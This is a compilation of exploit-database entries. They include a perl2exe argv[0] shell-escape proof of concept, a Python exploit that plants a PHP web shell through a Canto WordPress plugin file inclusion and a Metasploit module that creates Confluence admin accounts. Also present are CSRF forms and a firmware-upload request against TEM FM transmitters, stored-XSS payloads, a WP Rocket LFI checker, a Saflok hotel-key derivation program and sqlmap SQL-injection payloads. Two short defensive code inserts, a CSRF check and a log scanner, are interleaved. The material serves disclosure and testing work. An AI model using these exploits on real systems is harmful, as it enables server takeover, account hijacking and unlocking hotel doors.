# perl2exe packs perl scripts into native executables. Those executables use their 0th argument to locate a file to unpack and execute. Because of that, such executables can be made to execute another executable that has been compiled with perl2exe by controlling the 0th argument. That can be useful for breaking out of restricted shell environments.

# Proof of Concept:

user@testing:~/example$ ls
p2x-30.10-Linux-x64-5.30.1.tar.gz  perl2exe-Linux-x64-5.30.1
user@testing:~/example$
user@testing:~/example$ # Create and pack a "safe" perl script to target with the attack.
user@testing:~/example$ echo 'print("I am completely safe\n");' > safe.pl
user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe safe.pl
Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software
...
Generating safe
user@testing:~/example$
user@testing:~/example$ # Check that the program executes as expected.
user@testing:~/example$ ./safe
I am completely safe
user@testing:~/example$
user@testing:~/example$ # Create and pack a "malicious" script that we want to execute.
user@testing:~/example$ echo 'print("j/k I am malicious AF\n");system("/bin/sh");' > malicious.pl
user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe malicious.pl
Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software
...
Generating malicious
user@testing:~/example$
user@testing:~/example$ # Our "malicious" file doesn't need to have execution permissions.
user@testing:~/example$ chmod -x malicious
user@testing:~/example$ ./malicious
-bash: ./malicious: Permission denied
user@testing:~/example$
user@testing:~/example$ # Execute the "safe" program with the name of the "malicious" program as the 0th argument.
user@testing:~/example$ # The "safe" program will unpack and execute the "malicious" program instead of itself.
user@testing:~/example$ bash -c 'exec -a malicious ./safe'
j/k I am malicious AF
$ pstree -s $$
systemd───sshd───sshd───sshd───bash───safe───sh───pstree
$
-
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
# Exploit Title: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
# Date: 04/11/2023
# Exploit Author: Leopoldo Angulo (leoanggal1)
# Vendor Homepage: https://wordpress.org/plugins/canto/
# Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip
# Version: All versions of Canto Plugin prior to 3.0.5
# Tested on: Ubuntu 22.04, Wordpress 6.3.2, Canto Plugin 3.0.4
# CVE : CVE-2023-3452

#PoC Notes:
#The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452)
#This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code:
#... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ...
#This is just an example but there is this same misconfiguration in other lines of the vulnerable plugin files.
# More information in Leoanggal1's Github

#!/usr/bin/python3
import argparse
import http.server
import socketserver
import threading
import requests
import os
import subprocess

# Define the default web shell
default_web_shell = "<?php system($_GET['cmd']); ?>"


def create_admin_file(local_dir, local_shell=None):
    if not os.path.exists(local_dir):
        os.makedirs(local_dir)
    # If a local shell is provided, use it; otherwise, use the default web shell
    if local_shell:
        with open(f"{local_dir}/admin.php", "wb") as admin_file:
            with open(local_shell, "rb") as original_file:
                admin_file.write(original_file.read())
    else:
        with open(f"{local_dir}/admin.php", "w") as admin_file:
            admin_file.write(default_web_shell)


def start_local_server(local_port):
    Handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler)
    print(f"Local web server on port {local_port}...")
    # Serve from a background thread and return the server object so the caller
    # can stop it (serve_forever() blocks, so a return after it is never reached)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port):
    local_dir = "wp-admin"
    create_admin_file(local_dir, local_shell)
    target_url = f"{url}/wp-content/plugins/canto/includes/lib/download.php"
    local_server = f"http://{local_host}:{local_port}"
    command = f"cmd={command}"
    if local_shell:
        # If a local shell is provided, start netcat on the specified port
        subprocess.Popen(["nc", "-lvp", str(nc_port)])
    httpd = start_local_server(local_port)
    exploit_url = f"{target_url}?wp_abspath={local_server}&{command}"
    print(f"Exploitation URL: {exploit_url}")
    response = requests.get(exploit_url)
    print("Server response:")
    print(response.text)
    # Shutdown the local web server
    print("Shutting down local web server...")
    httpd.shutdown()
    httpd.server_close()


if __name__ == "__main__":
    examples = '''
Examples:
- Check the vulnerability
  python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33
- Execute a command
  python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'
- Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
  python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php
'''
    parser = argparse.ArgumentParser(
        description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452",
        epilog=examples,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("-u", "--url", required=True, default=None, help="Vulnerable URL")
    parser.add_argument("-s", "--shell", help="Local file for web shell")
    parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP")
    parser.add_argument("-LPORT", "--local_port", help="Local web server port")
    parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target")
    parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat")

    try:
        args = parser.parse_args()
        if args.local_port is None:
            args.local_port = 8080  # Default value if LPORT is not provided
        exploit_rfi(args.url, args.shell, args.local_host, int(args.local_port), args.command, args.nc_port)
    except SystemExit:
        parser.print_help()
-
TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution
TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution


Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
                  Webserver version: 1.7

Summary: This new line of Opera plus FM Transmitters combines very high efficiency, high reliability and low energy consumption in compact solutions. They have innovative functions and features that can eliminate the costs required by additional equipment: automatic exchange of audio sources, built-in stereo encoder, integrated RDS encoder, parallel I/O card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP Webserver.

Desc: The device allows access to an unprotected endpoint that allows MPFS File System binary image upload without authentication. The MPFS2 file system module provides a light-weight read-only file system that can be stored in external EEPROM, external serial Flash, or internal Flash program memory. This file system serves as the basis for the HTTP2 web server module, but is also used by the SNMP module and is available to other applications that require basic read-only storage capabilities. This can be exploited to overwrite the flash program memory that holds the web server's main interfaces and execute arbitrary code.

Tested on: Webserver


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5799
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5799.php


18.08.2023

--


POST /mpfsupload HTTP/1.1
Host: 192.168.1.2:8000
Content-Length: 251
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----joxypoxy2
User-Agent: MPFS2_PoC/2.0c
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------joxypoxy2
Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"
Content-Type: application/octet-stream

MPFS...<CGI BINARY PHONE HOME>
-----joxypoxy2--


HTTP/1.1 200 OK
Connection: close
Content-Type: text/html

<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>
-
TEM Opera Plus FM Family Transmitter 35.45 - XSRF
<!--
TEM Opera Plus FM Family Transmitter 35.45 XSRF

Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
Product web page: https://www.tem-italy.it
Affected version: Software version: 35.45
                  Webserver version: 1.7

Summary: This new line of Opera plus FM Transmitters combines very high efficiency, high reliability and low energy consumption in compact solutions. They have innovative functions and features that can eliminate the costs required by additional equipment: automatic exchange of audio sources, built-in stereo encoder, integrated RDS encoder, parallel I/O card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP Webserver.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: Webserver

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5800
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5800.php

18.08.2023
-->

CSRF Change Forward Power:
-------------------------

<html>
  <body>
    <form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
      <input type="hidden" name="Pwr" value="00100" />
      <input type="submit" value="Change" />
    </form>
  </body>
</html>

CSRF Change Frequency:
---------------------

<html>
  <body>
    <form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
      <input type="hidden" name="Freq" value="95.5" />
      <input type="submit" value="Change" />
    </form>
  </body>
</html>

CSRF Change User/Pass/Priv Change Admin/User/Pass:
-------------------------------------------------

<html>
  <body>
    <form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST">
      <input type="hidden" name="usr0" value="admin" />
      <input type="hidden" name="psw0" value="admin" />
      <input type="hidden" name="usr1" value="operator1" />
      <input type="hidden" name="psw1" value="operator1" />
      <input type="hidden" name="lev1" value="1" />
      <input type="hidden" name="usr2" value="operator2" />
      <input type="hidden" name="psw2" value="operator2" />
      <input type="hidden" name="lev2" value="1" />
      <input type="hidden" name="usr3" value="consulter1" />
      <input type="hidden" name="psw3" value="consulter1" />
      <input type="hidden" name="lev3" value="2" />
      <input type="hidden" name="usr4" value="consulter2" />
      <input type="hidden" name="psw4" value="consulter2" />
      <input type="hidden" name="lev4" value="2" />
      <input type="hidden" name="usr5" value="consulter3" />
      <input type="hidden" name="psw5" value="consulter3" />
      <input type="hidden" name="lev5" value="2" />
      <input type="submit" value="Change" />
    </form>
  </body>
</html>
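The "validity checks" the advisory says are missing are a per-session CSRF token and an origin check on every state-changing handler. The block below is an added example, not code from the ZSL advisory or from TEM's firmware: it models a request handler that receives parsed headers and form fields plus a session id (that handler model is an assumption), and takes the device origin http://192.168.1.2:8000 from the advisory's form actions. All request data in it is constructed.

```python
"""Added example: two server-side checks that defeat the cross-site forms above.
Not part of the ZSL advisory or the vendor firmware; the handler model
(parsed headers dict + parsed form dict + session id) is an assumption."""
import hashlib
import hmac
from typing import Mapping

# Assumption: the device's own origin, taken from the advisory's form actions.
DEVICE_ORIGIN = "http://192.168.1.2:8000"


def issue_csrf_token(session_id: str, server_secret: bytes) -> str:
    """Per-session synchronizer token: HMAC-SHA256(server_secret, session_id).

    The server embeds it as a hidden field in its own forms. A page on another
    origin cannot read it, so a forged form cannot include it."""
    return hmac.new(server_secret, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def origin_allowed(headers: Mapping[str, str]) -> bool:
    """Accept a state-changing request only if the browser says it came from us.

    Browsers attach Origin to cross-site POSTs (including enctype=text/plain
    forms like the ones above), so a forged submission carries the other site's
    origin. With neither Origin nor Referer there is no provenance: reject."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == DEVICE_ORIGIN
    referer = headers.get("Referer")
    if referer is not None:
        return referer.startswith(DEVICE_ORIGIN + "/")
    return False


def state_change_allowed(headers: Mapping[str, str], form: Mapping[str, str],
                         session_id: str, server_secret: bytes) -> bool:
    """Gate for /user/postcmd.htm- and /protect/accounts.htm-style handlers:
    both the origin check and the token check must pass."""
    if not origin_allowed(headers):
        return False
    presented = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id, server_secret)
    # Constant-time comparison so the token cannot be recovered via timing.
    return hmac.compare_digest(presented, expected)


def demo() -> dict:
    """Constructed requests: one from the device's own page, one forged with the
    shape of the 'Change Forward Power' form above. Returns which are accepted."""
    secret = b"constructed-demo-secret"   # constructed; a device would use a random stored secret
    token = issue_csrf_token("session-42", secret)
    legit = ({"Origin": DEVICE_ORIGIN}, {"Pwr": "00100", "csrf_token": token})
    forged = ({"Origin": "http://attacker.example"}, {"Pwr": "00100"})   # constructed origin
    return {
        "legit": state_change_allowed(*legit, "session-42", secret),
        "forged": state_change_allowed(*forged, "session-42", secret),
    }


if __name__ == "__main__":
    print(demo())
```

The two checks are independent on purpose: the origin check alone fails open on clients that strip Referer and send no Origin, and the token alone fails if the token is ever leaked into a URL, so a firmware handler should require both before acting on `Pwr`, `Freq` or the account fields.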
-
Atlassian Confluence Data Center and Server - Authentication Bypass (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',
        'Description' => %q{
          This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.
          A specially crafted request can be create new admin account without authentication on the target Atlassian server.
        },
        'Author' => [
          'Unknown', # exploited in the wild
          'Emir Polat' # metasploit module
        ],
        'References' => [
          ['CVE', '2023-22515'],
          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],
          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']
        ],
        'DisclosureDate' => '2023-10-04',
        'DefaultOptions' => {
          'RPORT' => 8090
        },
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),
      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
      OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/login.action')
    )

    return Exploit::CheckCode::Unknown unless res
    return Exploit::CheckCode::Safe unless res.code == 200

    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
    return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/

    confluence_version = Rex::Version.new(Regexp.last_match(1))
    vprint_status("Detected Confluence version: #{confluence_version}")

    if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||
       confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||
       confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))
      return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")
    end

    Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
  end

  def run
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/server-info.action'),
      'vars_get' => {
        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
      }
    )

    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200

    print_good('Found server-info.action! Trying to ignore setup.')

    created_user = create_admin_user

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),
      'headers' => {
        'X-Atlassian-Token' => 'no-check'
      }
    )

    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user

    print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200

    create_credential({
      workspace_id: myworkspace_id,
      origin_type: :service,
      module_fullname: fullname,
      username: datastore['NEW_USERNAME'],
      private_type: :password,
      private_data: datastore['NEW_PASSWORD'],
      service_name: 'Atlassian Confluence',
      address: datastore['RHOST'],
      port: datastore['RPORT'],
      protocol: 'tcp',
      status: Metasploit::Model::Login::Status::UNTRIED
    })

    print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")
    print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")
  end

  def create_admin_user
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),
      'headers' => {
        'X-Atlassian-Token' => 'no-check'
      },
      'vars_post' => {
        'username' => datastore['NEW_USERNAME'],
        'fullName' => 'New Admin',
        'email' => datastore['NEW_EMAIL'],
        'password' => datastore['NEW_PASSWORD'],
        'confirm' => datastore['NEW_PASSWORD'],
        'setup-next-button' => 'Next'
      }
    )

    res&.code == 302
  end
end
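Both the TEM advisory above (an unauthenticated POST to /mpfsupload) and this Confluence module leave a distinctive trace in the web server's access log: the setup-reset parameter on server-info.action followed by POSTs to the setup wizard from an instance that finished setup long ago. The block below is an added example, not code from either advisory or from Metasploit: a scanner that tags those request shapes in Common Log Format lines. The sample log lines, addresses and tag names are constructed.

```python
"""Added example: flag the request shapes from the two advisories above in
Common Log Format access logs. Not code from the advisories or Metasploit;
the sample lines and the tag names are constructed."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Common Log Format: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter the Confluence module sends to re-open the setup wizard.
SETUP_RESET_PARAM = "bootstrapStatusProvider.applicationConfig.setupComplete"


def classify_request(method: str, target: str) -> Optional[str]:
    """Return a tag for a request matching one of the advisories, else None."""
    parts = urlsplit(target)
    path, query = parts.path, parse_qs(parts.query)
    # TEM Opera Plus: firmware-image upload endpoint that needs no authentication.
    if method == "POST" and path == "/mpfsupload":
        return "tem-mpfs-upload"
    # CVE-2023-22515 step 1: flip setupComplete back to false via server-info.action.
    # endswith() because TARGETURI may put Confluence under a context path.
    if path.endswith("/server-info.action") and query.get(SETUP_RESET_PARAM) == ["false"]:
        return "confluence-setup-reset"
    # CVE-2023-22515 steps 2-3: drive the setup wizard on an installed instance.
    if method == "POST" and path.endswith(("/setup/setupadministrator.action",
                                           "/setup/finishsetup.action")):
        return "confluence-setup-admin"
    return None


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse each line and keep those that classify as an indicator."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # not CLF, or truncated: skip rather than crash
        tag = classify_request(m["method"], m["target"])
        if tag:
            hits.append({"ip": m["ip"], "ts": m["ts"], "tag": tag,
                         "status": int(m["status"]), "target": m["target"]})
    return hits


def tags_by_ip(hits: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Group tags per source address: setup-reset followed by setup-admin from
    one address is the whole CVE-2023-22515 chain, not an isolated probe."""
    grouped: Dict[str, List[str]] = {}
    for h in hits:
        grouped.setdefault(str(h["ip"]), []).append(str(h["tag"]))
    return grouped


# Constructed sample log (not real traffic); 10.0.0.x addresses are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Aug/2023:10:01:02 +0000] "GET /index.htm HTTP/1.1" 200 1532
10.0.0.9 - - [18/Aug/2023:10:01:07 +0000] "POST /mpfsupload HTTP/1.1" 200 118
10.0.0.7 - - [04/Oct/2023:12:00:00 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 302 0
10.0.0.7 - - [04/Oct/2023:12:00:01 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0
10.0.0.7 - - [04/Oct/2023:12:00:02 +0000] "POST /setup/finishsetup.action HTTP/1.1" 200 4410
10.0.0.8 - - [04/Oct/2023:12:05:00 +0000] "GET /login.action HTTP/1.1" 200 9001
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

On a Confluence instance that has completed setup, any hit on the setup endpoints is worth an alert regardless of status code; on the TEM transmitter the `200` on `/mpfsupload` is the same "MPFS Update Successful" response the advisory shows, so the status alone does not distinguish a legitimate firmware update from the unauthenticated one, and the source address and change window have to.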
-
WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - "Dashboard Redirect" field Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - "Dashboard Redirect" field Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 28/10/2023
# Exploit Author: Rachit Arora
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/admin-bar-dashboard-control/
# Version: 1.2.8
# Category: Web Application
# Tested on: Windows
# CVE : 2023-47184

1. Install WordPress (latest)
2. Install and activate Admin Bar & Dashboard Access Control.
3. Navigate to "Admin Bar & Dash" >> Under Dashboard Access and in the "Dashboard Redirect" enter the payload into the input field.

"onfocusin=alert``+autofocus>
"onfocusin=alert`document.domain`+autofocus>

4. You will observe that the payload is stored successfully; when the same functionality is triggered, the JavaScript payload executes and a pop-up appears.
-
WP Rocket < 2.10.3 - Local File Inclusion (LFI)
Paulos Yibelo discovered and reported this Local File Inclusion vulnerability in the WordPress WP Rocket Plugin. This could allow a malicious actor to include local files of the target website and show their output on the screen. Files which store credentials, such as database credentials, could potentially allow complete database takeover depending on the configuration. This vulnerability has been fixed in version 2.10.4.

https://patchstack.com/database/vulnerability/wp-rocket/wordpress-wp-rocket-plugin-2-10-3-local-file-inclusion-lfi-vulnerability
https://vulners.com/wpvulndb/WPVDB-ID:5484D821-7017-47A8-90D8-7D87CB5E0E50

Exploit :

#Code By E1.Coders
#Dork : "Powered by WP Rocket" filetype:php intitle:"WP Rocket Configuration" -"in" -"dirlist"

Dork : http://example.com/wp-content/plugins/wp-rocket/inc/functions/min/v2.10.3/min/min.php

import requests
import time

def check_wp_rocket_version(url):
    version_url = url + "/wp-rocket/css/rocket.css"
    try:
        response = requests.get(version_url)
        version = response.headers["X-Powered-By"]
        if "WP Rocket/" in version:
            version = version.split("/")[1]
            return version
    except Exception as e:
        print(f"Error occurred while fetching WP Rocket version: {e}")
    return None

def test_wp_rocket_lfi_bug(url):
    lfi_url = url + "/wp-rocket/inc/vendor/composer/installed.json"
    try:
        response = requests.get(lfi_url)
        if response.status_code == 200:
            return True
    except Exception as e:
        print(f"Error occurred while testing LFI: {e}")
    return False

def main():
    url = "http://arvatools.com"
    wp_rocket_version = check_wp_rocket_version(url)
    if wp_rocket_version:
        print(f"WP Rocket Version: {wp_rocket_version}")
        if wp_rocket_version in ["2.10.0", "2.10.1", "2.10.2", "2.10.3"]:
            result = test_wp_rocket_lfi_bug(url)
            if result:
                print("LFI vulnerability found in WP Rocket")
            else:
                print("LFI vulnerability not found in WP Rocket")
        else:
            print("WP Rocket version is not affected by the LFI bug")
    else:
        print("Unable to fetch WP Rocket version")

if __name__ == "__main__":
    main()
-
Saflok - Key Derivation Function Exploit
// Exploit Title: Saflok KDF
// Date: 2023-10-29
// Exploit Author: a51199deefa2c2520cea24f746d899ce
// Vendor Homepage: https://www.dormakaba.com/
// Version: System 6000
// Tested on: Dormakaba Saflok cards
// CVE: N/A

#include <stdio.h>
#include <stdint.h>

#define MAGIC_TABLE_SIZE 192
#define KEY_LENGTH 6
#define UID_LENGTH 4

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <32-bit uid value in hexadecimal format>\n", argv[0]);
        return 1;
    }

    uint8_t magic_table[MAGIC_TABLE_SIZE] = {
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xF0, 0x57, 0xB3, 0x9E, 0xE3, 0xD8,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x96, 0x9D, 0x95, 0x4A, 0xC1, 0x57,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x43, 0x58, 0x0D, 0x2C, 0x9D,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFF, 0xCC, 0xE0, 0x05, 0x0C, 0x43,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x34, 0x1B, 0x15, 0xA6, 0x90, 0xCC,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x89, 0x58, 0x56, 0x12, 0xE7, 0x1B,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xBB, 0x74, 0xB0, 0x95, 0x36, 0x58,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFB, 0x97, 0xF8, 0x4B, 0x5B, 0x74,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xC9, 0xD1, 0x88, 0x35, 0x9F, 0x92,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x92, 0xE9, 0x7F, 0x58, 0x97,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x16, 0x6C, 0xA2, 0xB0, 0x9F, 0xD1,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x27, 0xDD, 0x93, 0x10, 0x1C, 0x6C,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xDA, 0x3E, 0x3F, 0xD6, 0x49, 0xDD,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x58, 0xDD, 0xED, 0x07, 0x8E, 0x3E,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x5C, 0xD0, 0x05, 0xCF, 0xD9, 0x07,
        0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x11, 0x8D, 0xD0, 0x01, 0x87, 0xD0
    };

    uint8_t uid[UID_LENGTH];
    sscanf(argv[1], "%2hhx%2hhx%2hhx%2hhx", &uid[0], &uid[1], &uid[2], &uid[3]);

    uint8_t magic_byte = (uid[3] >> 4) + (uid[2] >> 4) + (uid[0] & 0x0F);
    uint8_t magickal_index = (magic_byte & 0x0F) * 12 + 11;

    uint8_t key[KEY_LENGTH] = {magic_byte, uid[0], uid[1], uid[2], uid[3], magic_byte};

    uint8_t carry_sum = 0;
    for (int i = KEY_LENGTH - 1; i >= 0 && magickal_index >= 0; i--, magickal_index--) {
        uint16_t keysum = key[i] + magic_table[magickal_index];
        key[i] = (keysum & 0xFF) + carry_sum;
        carry_sum = keysum >> 8;
    }

    printf("Generated Key: ");
    for (int i = 0; i < KEY_LENGTH; i++) {
        printf("%02X", key[i]);
    }
    printf("\n");

    return 0;
}
-
Blood Bank v1.0 - Multiple SQL Injection
# Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018

-------------------------------------------------------------------------------

1. Description:

The lack of proper input validation and sanitization on the 'hemail' and 'hpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.

Vulnerable File: /hospitalLogin.php
Parameter Names: hemail, hpassword

2. Proof of Concept:
----------------------

Execute sqlmap using either the 'hemail' or 'hpassword' parameter to retrieve the current database:

sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db

SQLMap Response:
----------------------

Parameter: hemail (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login

-------------------------------------------------------------------------------

1. Description:

The lack of proper input validation and sanitization on the 'remail' and 'rpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.

Vulnerable File: /receiverLogin.php
Parameter Names: remail, rpassword

2. Proof of Concept:
----------------------

Execute sqlmap using either the 'remail' or 'rpassword' parameter to retrieve the current database:

sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db

